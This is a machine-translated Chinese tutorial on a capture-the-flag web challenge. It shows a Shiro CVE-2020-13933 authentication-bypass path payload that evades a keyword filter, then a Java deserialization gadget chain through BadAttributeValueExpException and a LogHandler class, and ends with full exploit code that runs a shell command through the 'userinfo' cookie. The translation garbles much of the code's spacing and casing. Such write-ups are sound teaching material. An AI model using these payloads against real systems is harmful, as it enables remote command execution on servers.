Shulou(Shulou.com)06/01 Report--

This article mainly introduces "what is Java deserialization loophole". In daily operation, I believe many people have doubts about what Java deserialization loophole is. The editor consulted all kinds of data and sorted out simple and easy-to-use methods of operation. I hope it will be helpful to answer the question of "what is Java deserialization loophole"! Next, please follow the editor to study!

Preface of 0x00

In recent years, Java Web projects have become more and more common in work, and have gradually replaced the brilliant position of php in previous years.

Among the many Java Web vulnerabilities, deserialization vulnerabilities are unique. A large number of frameworks or middleware have deserialization vulnerabilities, which are loved by bosses and overturned the repeated ravages of the past, such as Shiro, Fastjson, JBoss, WebLogic, Structs2 and so on.

Based on a reappearance of an internal small-scale competition topic, this article briefly talks about deserialization vulnerabilities in Java code audit and the combined exploitation of other vulnerabilities. Due to the lowering of the learning threshold, there are a large number of excellent introductory articles on Java deserialization on major learning forums or websites, which have a detailed description and explanation of the basic concepts of Java and the basis of deserialization. This article will not dwell on the simple concepts in Java deserialization, starting with the topic itself.

0x01 text

The title itself is a Web topic and provides the source code.

Open the page and login window.

There is only one login window on the page. Try a wave of weak passwords with no results.

Then take a look at the code, import the jar package into JD-GUI, and click on it.

The approximate file structure is as follows:

The ShiroConfig.class content is as follows:

A simple audit found that index content needs to be authenticated, that is, login.

Looking at the IndexController.class corresponding to index, it is found that there are deserialization points.

The specific code is as follows:

If (cookies! = null) {for (Cookie c: cookies) {if (c.getName (). Equals ("userinfo")) {exist = true; cookie = c; break;} if (exist) {byte [] bytes = Tools.base64Decode (cookie.getValue ()); user = (User) Tools.deserialize (bytes) } else {user = new User (); user.setId (1); user.setName (name); cookie = new Cookie ("userinfo", Tools.base64Encode (Tools.serialize (user); response.addCookie (cookie);}

When the index is accessed, and the key of the existing cookie is userinfo, its value is deserialize.

The process is as follows:

Cookie [userinfo]-- > base64decode-- > deserialize

The temporary idea is to deserialize through cookie after logging in.

But according to MyRealm.class, the password is random.

The specific code is as follows:

Return new SimpleAuthenticationInfo (username, UUID.randomUUID (). ToString (). ReplaceAll ("-", "), getName ()

According to the BOOT-INF.lib.shiro-spring-1.5.3.jar in lib, the version of shiro is 1.5.3, and there is a CVE-2020-13933 permission bypass vulnerability.

According to https://xz.aliyun.com/t/8230, the common payload is / index/%3bxxx.

However, there is a filter AllFilter.class.

Public class AllFilter implements IAllFilter {public String filter (String param) {String [] keyWord = {"'", "\", "select", "union", "/;", "/% 3b"}; for (String I: keyWord) {param = param.replaceAll (I, ");} return param;}}

AllFilter will filter the characters of payload, and after trying, the final valid payload is / index/%3b/xxx.

After bypassing permissions, it is found that the background is logging.

When it comes to LogHandler.class, it will be used later in subsequent deserialization.

After bypassing permissions, find a way to deserialize.

The condition to be serialized is that the Java.io.Serializable interface must be inherited.

Look for class in the code that can be utilized.

LogHandler.class found.

There is a command execution point.

Public class LogHandler extends HashSet implements InvocationHandler {private static final long serialVersionUID = 1L; private String readLog = "tail / tmp/accessLog"; private Object target; private String writeLog = "echo / test > > / tmp/accessLog"; public LogHandler () {} public LogHandler (Object target) {this.target = target;} public Object invoke (Object proxy, Method method, Object [] args) throws Throwable {Tools.exeCmd (this.writeLog.replaceAll ("/ test", (String) args [0])) Return method.invoke (this.target, args);} public String toString () {return Tools.exeCmd (this.readLog);}}

LogHandler inherits HashSet.

HashSet inherits the Java.io.Serializable interface.

The partial code of HashSet is as follows:

Package Java.util;import Java.io.InvalidObjectException;import sun.misc.SharedSecrets;public class HashSetextends AbstractSetimplements Set, Cloneable, Java.io.Serializable {static final long serialVersionUID =-5024744406713321676L;.

The following pop chain is:

Deserialize-- > LogHandler-- > toString-- > exeCmd (readLog)

Condition: readLog is controllable.

ReadLog is a private property, and property values can be accessed through Java's reflection mechanism.

Method description: getDeclaredField (String name) gets a pair of attributes

For example:

Import Java.lang.reflect.*;public class AccessAttribute {public static void main (String [] args) throws Exception {Field aaa= UserClass.getDeclaredField ("name"); aaa.setAccessible (true); / / Private attribute, set accessible aaa.set (user, "liuxigua");}}

The ultimate goal: to find a Java native class that requires that you override the readObject method and call the toString method of the controllable class.

In the end, Baidu found BadAttributeValueExpException, and many Gadgets deserialized by Java use this class.

The partial code of BadAttributeValueExpException is as follows:

Public class BadAttributeValueExpException extends Exception {private static final long serialVersionUID =-3105272988410493376L; private Object val; public BadAttributeValueExpException (Object val) {this.val = val = = null? Null: val.toString ();} public String toString () {return "BadAttributeValueException:" + val;} private void readObject (ObjectInputStream ois) throws IOException, ClassNotFoundException {ObjectInputStream.GetField gf = ois.readFields (); Object valObj = gf.get ("val", null); if (valObj = = null) {val= null;} else if (valObj instanceof String) {val= valObj } else if (System.getSecurityManager () = = null | | valObj instanceof Long | | valObj instanceof Integer | | valObj instanceof Float | | valObj instanceof Double | | valObj instanceof Byte | | valObj instanceof Short | | valObj instanceof Boolean) {val = valObj.toString () } else {val = System.identityHashCode (valObj) + "@" + valObj.getClass (). GetName ();}}

You can finally call its toString method when you readObject by setting val to the logHandler class.

BadAttributeValueExpException (val)-- > LogHandler (readLog). ToString ()-- > serialize-- > base64encode cookie [userinfo]-- > base64decode-- > deserialize-- > LogHandler-- > toString-- > exeCmd (readLog)

Final Gadgets:

Javax.management.BadAttributeValueExpException.readObject ()-> tools.logHandler.toString ()-- > tools.Tools.exeCmd ()

Note: the payload code structure and file location need to be consistent with the server code structure and file location.

Package com.test.JavaWeb;import Javax.management.BadAttributeValueExpException;import com.test.JavaWeb.tools.Tools;import com.test.JavaWeb.tools.LogHandler;import Java.lang.reflect.Field;public class Exp {public static void main (String [] args) throws Exception {LogHandler logHandler = new LogHandler (); Field readLogField = LogHandler.class.getDeclaredField ("readLog"); readLogField.setAccessible (true); readLogField.set (logHandler, "touch / tmp/123") BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException (""); Field valField = BadAttributeValueExpException.class.getDeclaredField ("val"); valField.setAccessible (true); valField.set (badAttributeValueExpException,logHandler); byte [] bytes = Tools.serialize (badAttributeValueExpException); System.out.println (Tools.base64Encode (bytes));}}

After the payload is generated, enter the userinfo value of cookie to execute the command.

At this point, the study on "what is a Java deserialization vulnerability" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.